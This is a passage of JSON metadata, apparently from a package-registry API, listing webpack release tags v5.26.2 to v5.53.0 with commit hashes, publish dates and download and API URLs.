3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2F